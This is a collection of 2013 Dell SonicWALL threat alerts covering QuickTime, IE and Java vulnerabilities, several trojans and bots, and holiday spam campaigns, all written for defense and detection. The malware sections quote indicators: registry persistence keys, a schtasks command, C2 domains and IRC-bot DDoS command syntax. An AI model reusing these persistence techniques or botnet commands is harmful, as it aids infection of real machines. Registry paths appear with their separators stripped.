Apple QuickTime M-JPEG Heap Buffer Overflow (July 5, 2013)

/in /by

QuickTime is an extensible proprietary multimedia framework developed by Apple Inc. It is capable of handling various formats of digital video, picture, sound, panoramic images, and interactivity. QuickTime is integrated with Mac OS X, and it also supports Microsoft Windows.

A QuickTime movie file is a container file that can store both media metadata and media content in atoms (the basic data unit). One of the supported media contents is the Motion JPEG. Motion JPEG (M-JPEG or MJPEG) is a video format in which each video frame or interlaced field of a digital video sequence is compressed separately as a JPEG image.

A heap buffer overflow vulnerability exists in Apple QuickTime. Specifically, the vulnerability is due to insufficient validation while handling M-JPEG data in a movie file. A remote attacker can exploit this vulnerability by enticing a user to open a crafted movie file using Apple QuickTime. Successful exploitation could lead to arbitrary code execution in the security context of the logged-in user.

The vulnerability has been assigned as CVE-2013-1020.

Dell SonicWALL has released an IPS signature to detect and block specific exploitation attempts targeting this vulnerability. The signature is listed below:

  • 9960 Apple QuickTime Movie File Memory Corruption

Spam campaign roundup: The Independence Day Edition (July 3, 2013)

/in /by

Tomorrow is a federal holiday in the United States that celebrates its Independence Day. The 4th of July has been typically celebrated with fireworks, parades and concerts, as well as many retailers running sales and store specials. It should no longer be a surprise that spam emails abound when big holidays or events are just around the corner. This Independence Day week, cyber criminals did not disappoint.

Over the last week, the Dell SonicWALL threats research team has been following all Independence Day related spam emails.

As July 4th approaches, we observed an increasing amount of holiday related spam emails. These emails have a common theme of trying to lure consumers to click on the links and provide their personal information in exchange for access to deep discounts and offers. Most of these emails are poorly crafted with evident errors in grammar and spelling. The following are some of the most common email subjects:

  • Remanning inventory must go – Updated model list – 4th July Freedom Sale
  • Ford, Chevy, BMW, Doge – 4th of July dealer blow-out
  • July 4th 2013 Special: Apple tablet and phone priced 87% lower then stores near you
  • Apple iPhone and iPad priced 93% lower then stores (4th of July pre-sale)
  • Record low prices announced for 4th of July (view them now)
  • 4th of July Booty Call Message Waiting

Some of these emails look convincing while trying to attract consumers with promises of free gift certificates. Clicking the links on the email body will typically lead the user to an affiliate website and will then be asked to enter their personal information and to participate in a number of offers.

It is important to remember that these offers often cost money in fees or subscriptions without the guarantee of ever receiving the products and services or the free gift card at the end of the process.

We urge our users to always be vigilant and cautious with any unsolicited email and to avoid providing any personal information, particularly if you are not certain of the source.

Dell SonicWALL Gateway Antivirus monitors and provides constant protection against such malicious threats.

Infostealer Trojan with Bitcoin mining and DDoS features (May 30, 2013)

/in /by

The Dell SonicWALL Threats Research team came across a new Infostealer Trojan with Bitcoin mining and DDoS capabilities. This Trojan steals sensitive information from the user machine and uses the compromised system for Bitcoin mining activity as well as DDoS attacks.

Infection Cycle:

Upon execution, the Trojan creates the following files on the victim machine:

  • %Program Files%Common FilesNT Kernal0txklyboag.exe [Detected as GAV: Neurevt.A_4 (Trojan)]
  • %APPDATA%WinDefendersTTmacromedia.exe [Detected as GAV: Troj.SPNR_65 (Trojan)]
  • %APPDATA%WinDefendersTTshell.exe [Detected as GAV: Troj.SPNR_65 (Trojan)]
  • %APPDATA%WinDefenderstusft_ext.exe.vbs
  • %USERPROFILE%Start MenuProgramsStartupSkype.lnk

It adds the following registry key to ensure infection upon reboot:

  • HKLMSOFTWAREMicrosoftWindowsCurrentVersionRunNT Kernal & System: “%Program Files%Common FilesNT Kernal0txklyboag.exe”

The Trojan also adds multiple registry keys to prevent executables belonging to various Host AntiVirus and Security Tools from running. The images below show the code where the registry key values are being constructed for various security programs:

The following are examples of registry keys that got added on the infected system to prevent HijackThis and Malwarebytes from running:

  • HKLMSOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionshijackthis.exeDebugger: “gevihsc_.exe”
  • HKLMSOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsmbam.exeDebugger: “enxizg_.exe”
  • HKLMSOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsmbamgui.exeDebugger: “bzshdt_.exe”

The Trojan injects code into the process wuauclt.exe which is a genuine windows process. It also checks the presence of the following softwares and if found, terminates.

It injects the dropped executable in NT Kernal0 folder into running processes and this executable acts as a watcher process for wuauclt.exe. If the injected wuauclt.exe process is terminated, the watcher process will respawn the wuauclt.exe and injects it with malicious code.

The Trojan looks for following applications on the victim machine and steals User credentials, Connection details, Game Keys, and User’s contact list:

  • FileZilla
  • CoreFTP
  • SmartFTP
  • FlashFXP
  • WinSCP 2.0
  • FTP Commander Deluxe
  • Skype
  • PuTTy
  • Valve Steam client
  • EA Origin client
  • Blizzard Entertainment games, League of Legends, and MineCraft

The Trojan attempts to connect to the following domains to upload stolen information and downloads the bitcoin mining files:

  • betabros.in
  • betabros.com
  • poacher3.ipchina163.com

We also found traces of DDoS commands like slowloris, rudy, condis, httpget and udp as seen below:

Below is the description for these commands posted on underground forums:

  • !slowloris – Connects to a webserver through several hundred sockets per bot, and sits on it.
  • !udp – Sends mass amounts of random packets to target host/ip, perfect for home connections(SYNTAX: !udp host/ip port time)[Use ‘0’ to flood random ports]
  • !condis – Rapid connect/disconnect flood, it takes down gaming(ie. CSS) and teamspeak/VoiP servers like gravy(SYNTAX: !condis host/ip port time)
  • !httpget – Rapidly sends hundreds of HTTP GET requests every second from each bot.
  • !rudy – Slowly posts data to existing forms on a given website in many concurrent submissions.

The Trojan also disables following Windows system services:

SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

  • GAV: Neurevt.A_4 (Trojan)
  • GAV: Troj.SPNR_65 (Trojan)
  • GAV: Kryptik.BCFY (Trojan)

New Banker Trojan targeting Brazilian government site (June 28, 2013)

/in /by

The Dell SonicWALL Threats Research team came across a new Banker Trojan targeting a Brazilian Government Department of Treasury owned electronic invoice website, attempting to steal sensitive user information. The Trojan arrives as a Windows Control Panel Item file and is a UPX packed DLL written in Delphi. It pretends to be a proof of NF-e invoice and executes if the user attempts to open it.

Infection Cycle:

Upon execution, the Trojan checks for the presence of VMWare environment and terminates if detected.

It connects to a remote server in Brazil grupomasterplan.com.br to download multiple malicious executables in an encrypted format. The downloaded files are disguised as JPEG images as seen below:

  • GET /IMAGE(REMOVED)/m.jpg [Detected as GAV: Banload.SSE#enc (Trojan)]
  • GET /IMAGE(REMOVED)/u.jpg [Detected as GAV: Banload.SSE#enc (Trojan)]
  • GET /IMAGE(REMOVED)/d.jpg [Detected as GAV: Banload.SSE#enc (Trojan)]

The following files are dropped on the infected system:

  • %Windows%5xpg93.exe [Detected as GAV: Symmi.L_2 (Trojan)]
  • %Windows%vj0yn.b1rf5th5 [Detected as GAV: Banker.ZRG (Trojan)]
  • C:2013 [File based mutex to ensure it runs only once]
  • %USERPROFILE%Start MenuProgramsStartupf7xnd6.LNK [Points to %Windows%5xpg93.exe, esnures infection upon reboot]

The Trojan installs multiple hooks and launches the Brazilian Government Department of Treasury owned website in Internet Explorer as seen below:

Site description in english (Courtesy: Google Translation):

If the user enters the Access-Key and Access-Code information, even though this is the official government website the access information will be compromised because of the hooks installed:

SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

  • GAV: Banload.SEE (Trojan)
  • GAV: Banker.ZRG (Trojan)
  • GAV: Banload.SSE#enc (Trojan)
  • GAV: Symmi.L_2 (Trojan)

New Drive By Download exploits Latest Java Vulnerabilities (June 7, 2013)

/in /by

The Dell Sonicwall Threats Research team has found multiple drive-by-download attempts that leverage the underlying Java vulnerabilities and push corresponding malicious Java Applets. These Applets on successful exploitation download a malicious executable that dupes the user into believing that it is an AntiVirus. Specifically, the malware uses a couple of latest Java Vulnerabilities CVE-2013-0422, CVE-2013-2423 and exploits either one of them to get onto the user’s system. Oracle has already patched these vulnerabilities which are described below.

  • CVE-2013-0422 : By constructing a malformed Applet that uses getMBeanInstantiator Method of JmxMBeanServer class, an attacker can achieve arbitrary code execution. The MBeanInstantiator allows the attacker to instantiate restricted classes which eventually converts the applet into a trusted one.
  • CVE-2013-2423 : An attacker can create a malformed Applet using MethodHandles Method and type confusion to switch off Java’s security mechanism. Once a MethodHandle is obtained using findStaticSetter method, a static final field is allowed to be overwritten thereby causing type confusion.

Following are the sequence of events that lead to a drive-by-download :

User visits an infected webpage containing a malicious obfuscated JavaScript

The script tries to determine the vulnerable Java version.

Malicious applet exploiting CVE-2013-0422 is downloaded as per the first conditional check. Following are some excerpts from decompiled java class files that show the vulnerable Method, getMBeanInstantiator provided by Class, JmxMBeanServer.

Above, “ctrpq” function de-obfuscates the string to getMBeanInstantiator which is the vulnerable Method.

Same, “ctrpq” function gets the Class, com.sun.jmx.mbeanserver.JmxMBeanServer which provides the vulnerable Method.

Malicious applet exploiting CVE-2013-2423 is downloaded as per the second conditional check. Following are some of the decompiled Java instructions that employ vulnerable Method, MethodHandles which again is obfuscated.

We can see “eklaqkjz” function gets the string java.lang.invoke.MethodHandles.

A malicious exe is downloaded and executed after the exploit runs successfully.

The threat team has added following signatures to stop these attacks,

  • IPS: 9925 “Malformed Java Class File 2” covers CVE-2013-0422
  • IPS: 9926 “Malformed Java Class File 3” covers CVE-2013-2423
  • GAV: Kryptik.BCHO

Apple QuickTime TeXML Memory Corruption (June 26, 2013)

/in /by

QuickTime is an extensible multimedia framework developed by Apple Inc., capable of handling various formats of digital video, picture, sound, panoramic images, and interactivity. The classic version of QuickTime is available for Windows XP and later, as well as Mac OS X Leopard and later operating systems. Apple QuickTime supports a number of native file formats to store images, audio, and movies such as .mov for movies and .pct for image files.

TeXML has been developed as an OpenSource project with the aim to automatically present XML data as PDF with sophisticated layout properties. An example of an XML document, which has already been transformed into the TeXML structure:

  	 		documentclass[a4paper]{article} 		usepackage[latin1]{inputenc} 		usepackage[T1]{fontenc} 	 	 		Misinterpretation of special characters as being functional characters is called "Escaping", thus: $, ^, >

QuickTime TeXML has a specific format for constructing 3GPP-compliant timed text tracks in a QuickTime movie file. The following example demonstrates a typical TeXML file:

    	 		 			 		 		 			 			 			This is a simple run of text.

A memory corruption vulnerability exists in Apple QuickTime. A remote attacker can exploit this vulnerability by enticing a user to download and process a specially crafted TeXML file with the vulnerable software. This can lead to code execution in the context of the vulnerable application.

Dell SonicWALL Threat team has researched this vulnerability and released the following IPS signatures to address the issue:

  • 9957 Apple QuickTime TeXML Memory Corruption Buffer Overflow 1
  • 9958 Apple QuickTime TeXML Memory Corruption Buffer Overflow 2

This vulnerability is referred by CVE as CVE-2013-1015.

Windows IE Use-After-Free Vulnerability MS13-047 (June 21, 2013)

/in /by

Internet Explorer is a series of graphical web browsers developed by Microsoft and included as part of the Microsoft Windows line of operating systems. It is one of the most widely used web browsers. It is capable of rendering static and dynamic web content, as well as other web browsing related tasks such as displaying HTML pages, downloading files, parsing various image formats, running different types of multimedia content, and opening files in various formats using various plugins.

The Document Object Model (DOM) is a cross-platform and language-independent convention for representing and interacting with objects in HTML, XHTML and XML documents. Objects in the DOM tree may be addressed and manipulated by using methods on the objects. The public interface of a DOM is specified in its application programming interface (API). From version 6, Internet Explorer 6 started supporting the DOM structure. In the DOM, all HTML tags and their attributes are stored in a tree-like structure as nodes, along with the text and other literal data that form the leaves of this tree. IE supports dynamic manipulation of the DOM through client side scripting.

A use-after-free vulnerability exists in Microsoft Internet Explorer when IE is handling one of the DOM objects. By exploiting this vulnerability, Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site. Any successfully injected code will be executed in the context of the currently logged on user.

Dell SonicWALL threat team has researched this vulnerability and released the following IPS signature:

  • 9954 Windows IE Use-After-Free Vulnerability (MS13-047) 15

This vulnerability has been referred by CVE as CVE-2013-3121.

A wave of C++ based IRCBot discovered in the wild (June 21, 2013)

/in /by

The Dell SonicWALL Threats Research team has observed a recent wave of a C++ based IRC bot which is very similar to a bot covered in a previous alert . This bot appears to be hosted on compromised legitimate websites that aim to infect unsuspecting web surfers visiting these infected websites. The bot installer may arrive in the computer with file names such as, quick.exe, wmplayer.exe or check.exe with the following file properties information:

Infection Cycle:

Upon execution the bot creates a copy of itself into the following folders:

  • %windir%-(random digits)unsecapp.exe [Detected as GAV: Injector.AHXY (Trojan)]
  • %temp%file.exe [Detected as GAV: Injector.AHXY (Trojan)]

In order to start after reboot the bot adds the following keys to the registry:

  • HKCUsoftwaremicrosoftwindowscurrentversionrun [adobeupdate] “%temp%file.exe”
  • HKCUsoftwaremicrosoftwindowscurrentversionrunonce [*-(random digits)] “%windir%-(random digits)unsecapp.exe”
  • HKLMsoftwaremicrosoftwindowscurrentversionrunonce [*-(random digits)] “%windir%-(random digits)unsecapp.exe”

It also executes the following command to run itself with the highest privileges whenever a user logs on:

  • %system%schtasks.exe [SCHTASKS /CREATE /SC ONLOGON /TN A-(*random folder name*) /TR %windir%-(random digits)unsecapp.exe /RL HIGHEST]

The bot modifies the values of the following registry keys to hide its presence within the system:

  • HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoFolderOptions dword:00000001
  • HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerAdvancedHidden dword:00000002

It also disables Windows Update by modifying the following registry key:

  • HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoWindowsUpdate dword:00000001

It connects to an IRC server:

And then joins an IRC channel named #marketevo:

Upon successful connection to an IRC server, a bot will typically wait for commands from its operator. This allows an attacker to perform a number of actions such as the following commands which are present in the binary’s strings:

  • decrypt
  • download
  • update
  • arguments
  • ftp.upload
  • filesearch
  • silent
  • connect
  • notice
  • invite
  • flood.channel
  • kill.user

Within minutes of joining the #marketevo channel, we noticed an influx of users joining from presumably infected machines spanning from different parts of the world.

During our analysis, we also observed the bot sending private messages to the channel:

SonicWALL Gateway AntiVirus provides protection against this threat via the following signature:

  • GAV: Injector.AHXY (Trojan)

New Adware Trojan plays continuous audio ads (June 14, 2013)

/in /by

The Dell SonicWALL Threats Research team have discovered a new adware Trojan that plays a continous stream of audio advertisements in the background. The content of the ads can range from dating to politics. The audio can originate from various sources such as video links from youtube pages.

Infection Cycle:

The Trojan uses the following icon:

The following is a sample of DNS queries made by the Trojan:

The Trojan adds the following files to the filesystem:

  • %PROGRAMFILES%K14Rfeedsavcodec-53.dll
  • %PROGRAMFILES%K14Rfeedsavformat-53.dll
  • %PROGRAMFILES%K14Rfeedsavutil-51.dll
  • %PROGRAMFILES%K14RfeedsAwesomium.dll
  • %PROGRAMFILES%K14Rfeedsawesomium.log
  • %PROGRAMFILES%K14Rfeedsawesomium_pak_utility.exe
  • %PROGRAMFILES%K14Rfeedsawesomium_process.exe
  • %PROGRAMFILES%K14RfeedsCachedata_0
  • %PROGRAMFILES%K14RfeedsCachedata_1
  • %PROGRAMFILES%K14RfeedsCachedata_2
  • %PROGRAMFILES%K14RfeedsCachedata_3
  • %PROGRAMFILES%K14RfeedsCachef_000001 – 00004b
  • %PROGRAMFILES%K14RfeedsCacheindex
  • %PROGRAMFILES%K14RfeedsCookies
  • %PROGRAMFILES%K14Rfeedsgoogle_result.jpg
  • %PROGRAMFILES%K14Rfeedsicudt.dll
  • %PROGRAMFILES%K14Rfeedskworker.exe
  • %PROGRAMFILES%K14RfeedslibEGL.dll
  • %PROGRAMFILES%K14RfeedslibGLESv2.dll
  • %PROGRAMFILES%K14RfeedsLocal Storage
  • %PROGRAMFILES%K14RfeedsLocal Storagehttps_www.google.com_0.localstorage
  • %PROGRAMFILES%K14Rfeedsreferers.txt
  • %PROGRAMFILES%K14RfeedsSDL.dll
  • %PROGRAMFILES%K14Rfeedssilentium.exe [Detected as GAV: Clicker.BDIK (Adware)]
  • %PROGRAMFILES%K14Rfeedsx86NPSWF32_11_5_502_135.dll
  • %PROGRAMFILES%K14Rfeedsyoutube_result.jpg
  • %PROGRAMFILES%K14Rlupdater.exe [Detected as GAV: MalAgent.G_2412 (Trojan)]
  • %PROGRAMFILES%K14Rsnupdater.exe [Detected as GAV: Clicker.BDHP (Adware)]
  • %PROGRAMFILES%K14Ruvname.conf
  • %PROGRAMFILES%K14Rversions.conf
  • %PROGRAMFILES%K14RWindowsService.exe [Detected as GAV: Clicker.BBII (Adware)]

The cache directory contains HTML data from webpages that it visits.

referers.txt contains the following data:

      twitter|http://t.co/
      pinterest|http://pinterest.com/pin/
      facebook|http://www.facebook.com/l.php?u=%s&h=%s&s=1

The Trojan requests a list of modules to download from a remote webserver and proceeds to download them. The modules are required for audio playback and downloading ads from sites:

The Trojan spawns multiple copies of silentium.exe and awesomium_process.exe:

An instance of silentium.exe was observed being spawned with the following commandline showing the source of one of the ads from youtube.com:

After a short period of time the victim is bombarded with various audio ads that play continuously in the background. Due to a number of instances of silentium.exe running, multiple ads are played over each other. The above commandline resulted in audio advertisments from a dating site being played in the background.

SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

  • GAV: Clicker.BDIK (Adware)
  • GAV: Clicker.BDHP (Adware)
  • GAV: Clicker.BBII (Adware)
  • GAV: Clicker.BDHP_2 (Adware)
  • GAV: MalAgent.G_2412 (Trojan)

Spam campaign roundup: The Fathers Day Edition (June 14, 2013)

/in /by

Father’s Day is coming up this weekend. It is a day of honoring fathers and in many countries it is celebrated on the third Sunday of June. Many will buy gifts and struggle for last minute ideas. Because shoppers are expected to spend, cyber criminals will use this opportunity to profit through spam campaigns.

Over the last week, the Dell SonicWALL threats research team has been tracking all Father’s Day related spam emails.

screenshot

As the Father’s Day weekend approaches, we are receiving an increasing amount of holiday related spam emails. These emails have a common theme of trying to lure consumers to click on the links and provide their personal information in exchange for access to special offers. The following are some of the most common email subjects:

  • 31 Hours Left On All Father’s Day Deals
  • Please activate your 2,300 dollars by Fathers Day
  • Nobody will believe you paid 50% less on your car at this Fathers day Event
  • Father Day – Get 15 Premium Cigars + Bonus Humidor + Free Shipping!
  • Instant Price Markdowns if you are a father on Fathers Day (must see this)(50% off) Fathers Day Mark

screenshot

The links on the emails will take users to a spam site which is part of the same affiliate marketing scheme that we have seen in the past. It tries to convince users to sign up for different offers and these scammers will earn commissions for each successful subscription.

We urge our users to always be vigilant and cautious with any unsolicited email and to avoid providing any personal information, particularly if you are not certain of the source.

Dell SonicWALL Gateway Antivirus monitors and provides constant protection against such malicious threats.